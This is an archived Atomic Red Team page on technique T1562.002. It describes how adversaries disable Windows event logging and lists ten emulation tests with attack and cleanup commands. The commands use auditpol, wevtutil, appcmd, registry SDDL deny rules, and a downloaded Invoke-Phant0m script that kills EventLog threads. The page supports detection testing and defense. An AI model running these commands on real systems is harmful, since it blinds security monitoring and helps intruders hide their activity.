atomic-red-team/atomics/T1562.002/T1562.002.md at master ·
redcanaryco/atomic-red-team
By Atomic Red Team doc generator
Archived: 2026-04-05 20:08:38 UTC
T1562.002 - Impair Defenses: Disable Windows Event Logging
Description from ATT&CK
Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.
Windows event logs record user and system activity such as login attempts, process creation, and much more.
(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
The EventLog service maintains event logs from various system components and applications.(Citation:
EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit
policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service
logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security
Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit
Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation:
Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)
Adversaries may target system-wide logging or just that of a particular application. For example, the Windows
EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config
eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name
EventLog ).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service
may be disabled by modifying the “Start” value in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog then restarting the system for the change
to take effect.(Citation: disable_win_evt_logging)
There are several ways to disable the EventLog service via registry key modification. First, without Administrator
privileges, adversaries may modify the "Start" value in the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security , then reboot the
system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with
Administrator privilege, adversaries may modify the same values in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System and
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application to disable the
entire EventLog.(Citation: disable_win_evt_logging)
Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or
clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the
/success or /failure parameters. For example, auditpol /set /category:”Account Logon”
/success:disable /failure:disable turns off auditing for the Account Logon category.(Citation:
auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the
following lines: auditpol /clear /y or auditpol /remove /allusers .(Citation: T1562.002_redcanaryco)
By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise
behind.
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
Page 1 of 7

Source
Atomic Tests
Atomic Test #1: Disable Windows IIS HTTP Logging
Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell
Atomic Test #3: Kill Event Log Service Threads
Atomic Test #4: Impair Windows Audit Log Policy
Atomic Test #5: Clear Windows Audit Policy Config
Atomic Test #6: Disable Event Logging with wevtutil
Atomic Test #7: Makes Eventlog blind with Phant0m
Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell
Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell
Atomic Test #1: Disable Windows IIS HTTP Logging
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires
HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
Supported Platforms: Windows
auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db
Inputs
Name Description Type Default Value
website_name The name of the website on a server string Default Web Site
Attack Commands: Run with powershell !
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
Cleanup Commands
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
 C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$n
}
Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires
HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
Supported Platforms: Windows
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
Page 2 of 7

auto_generated_guid: a957fb0f-1e85-49b2-a211-413366784b1e
Inputs
Name Description Type Default Value
website_name The name of the website on a server string Default Web Site
Attack Commands: Run with powershell !
set-WebConfigurationProperty -PSPath "IIS:\Sites\#{website_name}\" -filter "system.webServer/httpLogging" -nam
Cleanup Commands
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
 C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$n
}
Atomic Test #3: Kill Event Log Service Threads
Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal
state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
Supported Platforms: Windows
auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd
Attack Commands: Run with powershell ! Elevation Required (e.g. root or admin)
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke
$output = "$env:TEMP\Invoke-Phant0m.ps1"
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
cd $env:TEMP
Import-Module .\Invoke-Phant0m.ps1
Invoke-Phant0m
Cleanup Commands
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
Atomic Test #4: Impair Windows Audit Log Policy
Disables the windows audit policy to prevent key host based telemetry being written into the event logs. Solarigate example
Supported Platforms: Windows
auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
Page 3 of 7

Attack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)
auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable
Cleanup Commands
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
Atomic Test #5: Clear Windows Audit Policy Config
Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the
security log.
Supported Platforms: Windows
auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6
Attack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)
auditpol /clear /y
auditpol /remove /allusers
Cleanup Commands
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
Atomic Test #6: Disable Event Logging with wevtutil
Wevtutil can be used to disable logs. NOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.
Supported Platforms: Windows
auto_generated_guid: b26a3340-dad7-4360-9176-706269c74103
Inputs
Name Description Type Default Value
log_name Name of the log to be disabled string Microsoft-Windows-IKE/Operational
Attack Commands: Run with command_prompt !
wevtutil sl "#{log_name}" /e:false
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
Page 4 of 7

Cleanup Commands
wevtutil sl "#{log_name}" /e:true
Atomic Test #7: Makes Eventlog blind with Phant0m
Use Phant0m to disable Eventlog
Supported Platforms: Windows
auto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
Inputs
Name Description Type Default Value
file_name exe version of Phant0m path PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
Attack Commands: Run with command_prompt !
Cleanup Commands
echo "Sorry you have to reboot"
Dependencies: Run with powershell !
Description: Phant0m.exe must exist on disk at specified location (#{file_name})
Check Prereq Commands
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
Get Prereq Commands
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe
Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the
"ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These
modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling
who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via
the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
Supported Platforms: Windows
auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
Inputs
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
Page 5 of 7

Name Description Type Default Value
ChannelPath
Path to the
event log
service
channel to
alter
string
HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsof
Windows-TaskScheduler/Operational
Attack Commands: Run with powershell ! Elevation Required (e.g. root or admin)
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
Cleanup Commands
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S
Restart-Service -Name EventLog -Force -ErrorAction Ignore
Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the
"ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These
modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling
who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via
the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
Supported Platforms: Windows
auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
Inputs
Name Description Type Default Value
ChannelPath
Path to the event log
service channel to alter
string HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
Attack Commands: Run with powershell ! Elevation Required (e.g. root or admin)
New-Item -Path #{ChannelPath} -Force
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
Cleanup Commands
Remove-Item -Path #{ChannelPath} -Force
Restart-Service -Name EventLog -Force -ErrorAction Ignore
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
Page 6 of 7

Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell
This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the
"CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These
modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling
who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via
the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
Supported Platforms: Windows
auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
Inputs
Name Description Type Default Value
CustomSDPath
Path to the event log
service channel to alter
string HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
Attack Commands: Run with powershell ! Elevation Required (e.g. root or admin)
Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Cleanup Commands
Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"
Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
Page 7 of 7